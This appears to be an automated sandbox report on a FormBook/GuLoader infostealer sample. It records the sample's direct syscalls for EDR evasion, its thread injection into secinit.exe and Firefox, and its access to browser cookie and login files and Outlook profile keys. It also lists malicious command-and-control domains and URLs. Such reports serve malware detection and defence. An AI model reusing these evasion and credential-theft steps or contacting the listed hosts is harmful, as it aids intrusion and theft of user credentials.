        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E4EF mov eax, dword ptr fs:[00000030h]8_2_3294E4EF
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CF409 mov eax, dword ptr fs:[00000030h]8_2_329CF409
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290640D mov eax, dword ptr fs:[00000030h]8_2_3290640D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290B420 mov eax, dword ptr fs:[00000030h]8_2_3290B420
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32947425 mov eax, dword ptr fs:[00000030h]8_2_32947425
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32947425 mov ecx, dword ptr fs:[00000030h]8_2_32947425
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3299F42F mov eax, dword ptr fs:[00000030h]8_2_3299F42F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3299F42F mov eax, dword ptr fs:[00000030h]8_2_3299F42F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3299F42F mov eax, dword ptr fs:[00000030h]8_2_3299F42F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3299F42F mov eax, dword ptr fs:[00000030h]8_2_3299F42F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3299F42F mov eax, dword ptr fs:[00000030h]8_2_3299F42F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291D454 mov eax, dword ptr fs:[00000030h]8_2_3291D454
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291D454 mov eax, dword ptr fs:[00000030h]8_2_3291D454
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291D454 mov eax, dword ptr fs:[00000030h]8_2_3291D454
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291D454 mov eax, dword ptr fs:[00000030h]8_2_3291D454
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291D454 mov eax, dword ptr fs:[00000030h]8_2_3291D454
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291D454 mov eax, dword ptr fs:[00000030h]8_2_3291D454
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293E45E mov eax, dword ptr fs:[00000030h]8_2_3293E45E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293E45E mov eax, dword ptr fs:[00000030h]8_2_3293E45E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293E45E mov eax, dword ptr fs:[00000030h]8_2_3293E45E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293E45E mov eax, dword ptr fs:[00000030h]8_2_3293E45E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293E45E mov eax, dword ptr fs:[00000030h]8_2_3293E45E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920445 mov eax, dword ptr fs:[00000030h]8_2_32920445
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920445 mov eax, dword ptr fs:[00000030h]8_2_32920445
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920445 mov eax, dword ptr fs:[00000030h]8_2_32920445
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920445 mov eax, dword ptr fs:[00000030h]8_2_32920445
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920445 mov eax, dword ptr fs:[00000030h]8_2_32920445
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920445 mov eax, dword ptr fs:[00000030h]8_2_32920445
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32918470 mov eax, dword ptr fs:[00000030h]8_2_32918470
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32918470 mov eax, dword ptr fs:[00000030h]8_2_32918470
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CF478 mov eax, dword ptr fs:[00000030h]8_2_329CF478
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329DA464 mov eax, dword ptr fs:[00000030h]8_2_329DA464
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32942594 mov eax, dword ptr fs:[00000030h]8_2_32942594
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298E588 mov eax, dword ptr fs:[00000030h]8_2_3298E588
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298E588 mov eax, dword ptr fs:[00000030h]8_2_3298E588
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329145B0 mov eax, dword ptr fs:[00000030h]8_2_329145B0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329145B0 mov eax, dword ptr fs:[00000030h]8_2_329145B0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329985AA mov eax, dword ptr fs:[00000030h]8_2_329985AA
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329465D0 mov eax, dword ptr fs:[00000030h]8_2_329465D0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F5C7 mov eax, dword ptr fs:[00000030h]8_2_3290F5C7
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F5C7 mov eax, dword ptr fs:[00000030h]8_2_3290F5C7
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F5C7 mov eax, dword ptr fs:[00000030h]8_2_3290F5C7
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F5C7 mov eax, dword ptr fs:[00000030h]8_2_3290F5C7
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F5C7 mov eax, dword ptr fs:[00000030h]8_2_3290F5C7
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F5C7 mov eax, dword ptr fs:[00000030h]8_2_3290F5C7
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F5C7 mov eax, dword ptr fs:[00000030h]8_2_3290F5C7
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F5C7 mov eax, dword ptr fs:[00000030h]8_2_3290F5C7
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F5C7 mov eax, dword ptr fs:[00000030h]8_2_3290F5C7
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3299C5FC mov eax, dword ptr fs:[00000030h]8_2_3299C5FC
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291B5E0 mov eax, dword ptr fs:[00000030h]8_2_3291B5E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291B5E0 mov eax, dword ptr fs:[00000030h]8_2_3291B5E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291B5E0 mov eax, dword ptr fs:[00000030h]8_2_3291B5E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291B5E0 mov eax, dword ptr fs:[00000030h]8_2_3291B5E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291B5E0 mov eax, dword ptr fs:[00000030h]8_2_3291B5E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291B5E0 mov eax, dword ptr fs:[00000030h]8_2_3291B5E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329415EF mov eax, dword ptr fs:[00000030h]8_2_329415EF
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BF51B mov eax, dword ptr fs:[00000030h]8_2_329BF51B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BF51B mov eax, dword ptr fs:[00000030h]8_2_329BF51B

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtSetInformationProcess: Direct from: 0x77972B7CJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtWriteVirtualMemory: Direct from: 0x77972D5CJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtMapViewOfSection: Direct from: 0x77972C3CJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtNotifyChangeKey: Direct from: 0x77973B4CJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtReadVirtualMemory: Direct from: 0x77972DACJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtSetInformationThread: Direct from: 0x77966319Jump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtOpenKeyEx: Direct from: 0x77973BBCJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtQueryInformationToken: Direct from: 0x77972BCCJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtProtectVirtualMemory: Direct from: 0x77967A4EJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtOpenFile: Direct from: 0x77972CECJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtQueryVolumeInformationFile: Direct from: 0x77972E4CJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtDeviceIoControlFile: Direct from: 0x77972A0CJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtQueryValueKey: Direct from: 0x77972B0CJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtOpenSection: Direct from: 0x77972D2CJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtCreateFile: Direct from: 0x77972F0CJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtSetInformationThread: Direct from: 0x77972A6CJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtQueryAttributesFile: Direct from: 0x77972D8CJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtClose: Direct from: 0x77972A8C
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtCreateKey: Direct from: 0x77972B8CJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtQuerySystemInformation: Direct from: 0x779747ECJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtWriteVirtualMemory: Direct from: 0x7797482CJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtProtectVirtualMemory: Direct from: 0x77972EBCJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtQueryInformationProcess: Direct from: 0x77972B46Jump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtResumeThread: Direct from: 0x77972EDCJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtCreateUserProcess: Direct from: 0x7797363CJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtAllocateVirtualMemory: Direct from: 0x7797480CJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtOpenKeyEx: Direct from: 0x77972ABCJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtDelayExecution: Direct from: 0x77972CFCJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtReadFile: Direct from: 0x779729FCJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtQuerySystemInformation: Direct from: 0x77972D1CJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtAllocateVirtualMemory: Direct from: 0x77972B1CJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeNtResumeThread: Direct from: 0x779735CCJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: NULL target: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: NULL target: C:\Windows\SysWOW64\secinit.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: NULL target: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: NULL target: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\SysWOW64\secinit.exeThread register set: target process: 9140Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Windows\SysWOW64\secinit.exeThread APC queued: target process: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeProcess created: C:\Users\user\Desktop\fJuwM4Bwi7.exe "C:\Users\user\Desktop\fJuwM4Bwi7.exe"Jump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeProcess created: C:\Windows\SysWOW64\secinit.exe "C:\Windows\SysWOW64\secinit.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: SLePhgUCFUcrYZVod.exe, 00000009.00000002.83832728590.0000000001510000.00000002.00000001.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 00000009.00000000.79101763259.0000000001510000.00000002.00000001.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000000.79246703262.0000000001AE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
        Source: SLePhgUCFUcrYZVod.exe, 00000009.00000002.83832728590.0000000001510000.00000002.00000001.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 00000009.00000000.79101763259.0000000001510000.00000002.00000001.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000000.79246703262.0000000001AE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: SLePhgUCFUcrYZVod.exe, 00000009.00000002.83832728590.0000000001510000.00000002.00000001.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 00000009.00000000.79101763259.0000000001510000.00000002.00000001.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000000.79246703262.0000000001AE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: SLePhgUCFUcrYZVod.exe, 00000009.00000002.83832728590.0000000001510000.00000002.00000001.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 00000009.00000000.79101763259.0000000001510000.00000002.00000001.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000000.79246703262.0000000001AE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 5_2_00405D58 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,5_2_00405D58

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0000000A.00000002.83833661006.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.79178393595.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.83831074865.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.83833772004.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.83832835974.0000000001450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.83833394581.0000000004920000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.79195519059.0000000034A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\secinit.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0000000A.00000002.83833661006.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.79178393595.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.83831074865.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.83833772004.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.83832835974.0000000001450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.83833394581.0000000004920000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.79195519059.0000000034A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		312
        Process Injection        		1
        Masquerading        		1
        OS Credential Dumping        		21
        Security Software Discovery        		Remote Services1
        Email Collection        		11
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        Abuse Elevation Control Mechanism        		2
        Virtualization/Sandbox Evasion        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Archive Collected Data        		4
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading        		312
        Process Injection        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin Shares1
        Data from Local System        		5
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Deobfuscate/Decode Files or Information        		NTDS1
        Application Window Discovery        		Distributed Component Object Model1
        Clipboard Data        		6
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Abuse Elevation Control Mechanism        		LSA Secrets3
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
        Obfuscated Files or Information        		Cached Domain Credentials4
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1451684 Sample: fJuwM4Bwi7.exe Startdate: 04/06/2024 Architecture: WINDOWS Score: 100 31 www.runonbattery.com 2->31 33 www.respirelavie.net 2->33 35 22 other IPs or domains 2->35 49 Multi AV Scanner detection for domain / URL 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus detection for URL or domain 2->53 55 5 other signatures 2->55 10 fJuwM4Bwi7.exe 2 44 2->10         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 10->29 dropped 13 fJuwM4Bwi7.exe 6 10->13         started        process6 dnsIp7 43 drive.google.com 142.250.217.174, 443, 49842 GOOGLEUS United States 13->43 45 drive.usercontent.google.com 172.217.215.132, 443, 49843 GOOGLEUS United States 13->45 67 Maps a DLL or memory area into another process 13->67 17 SLePhgUCFUcrYZVod.exe 13->17 injected signatures8 process9 signatures10 47 Found direct / indirect Syscall (likely to bypass EDR) 17->47 20 secinit.exe 13 17->20         started        process11 signatures12 57 Tries to steal Mail credentials (via file / registry access) 20->57 59 Tries to harvest and steal browser information (history, passwords, etc) 20->59 61 Modifies the context of a thread in another process (thread injection) 20->61 63 2 other signatures 20->63 23 SLePhgUCFUcrYZVod.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.innovtech.life 203.161.49.193, 49851, 49852, 49853 VNPT-AS-VNVNPTCorpVN Malaysia 23->37 39 www.cd14j.us 91.195.240.123, 49855, 49856, 49857 SEDO-ASDE Germany 23->39 41 10 other IPs or domains 23->41 65 Found direct / indirect Syscall (likely to bypass EDR) 23->65 signatures15

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        fJuwM4Bwi7.exe100%AviraTR/AD.NsisInject.ssylu
        fJuwM4Bwi7.exe53%ReversingLabsWin32.Trojan.Guloader
        fJuwM4Bwi7.exe55%VirustotalBrowse
        fJuwM4Bwi7.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        parkingpage.namecheap.com0%VirustotalBrowse
        www.innovtech.life100%Sophos S4malware repository domain
        www.innovtech.life9%VirustotalBrowse
        www.auetravel.kz0%VirustotalBrowse
        belgravevilla.com0%VirustotalBrowse
        drive.usercontent.google.com1%VirustotalBrowse
        respirelavie.net0%VirustotalBrowse
        cdl-lb-1356093980.us-east-1.elb.amazonaws.com0%VirustotalBrowse
        drive.google.com0%VirustotalBrowse
        www.accentbathrooms.com1%VirustotalBrowse
        www.k4ryd.us1%VirustotalBrowse
        brongal.by1%VirustotalBrowse
        www.nurenose.com1%VirustotalBrowse
        www.cd14j.us0%VirustotalBrowse
        www.jdps.org0%VirustotalBrowse
        www.airportsurvery.com0%VirustotalBrowse
        www.respirelavie.net0%VirustotalBrowse
        www.brongal.by0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://www.innovtech.life/8cwt/?24eluX=SSpGlvD+1syJM+fS7Z8C1Cd2ZLeBmOr+68qPZxMelqgcCM6DsfmVmmLjkXM2/P+9S0q4oxoduwfupYzMqMwdcdYcBeP38sFbk5TUrAJPEOGdI/gD7BvPJp4=&Mjnd0=JZHP8Tx0t6100%Sophos S4malware repository domain
        http://www.innovtech.life/8cwt/100%Sophos S4malware repository domain
        https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search0%Avira URL Cloudsafe
        http://www.brongal.by/8cwt/0%Avira URL Cloudsafe
        https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
        http://brongal.by/8cwt/?24eluX=2L0w4dAlDepmBmTjVKMMeU7pTlJruWimQKtzQaHnPyexis6Apolau40%Avira URL Cloudsafe
        https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
        https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search0%VirustotalBrowse
        https://login.lihttps://login.li00%Avira URL Cloudsafe
        http://www.accentbathrooms.com/8cwt/0%Avira URL Cloudsafe
        https://duckduckgo.com/ac/?q=0%VirustotalBrowse
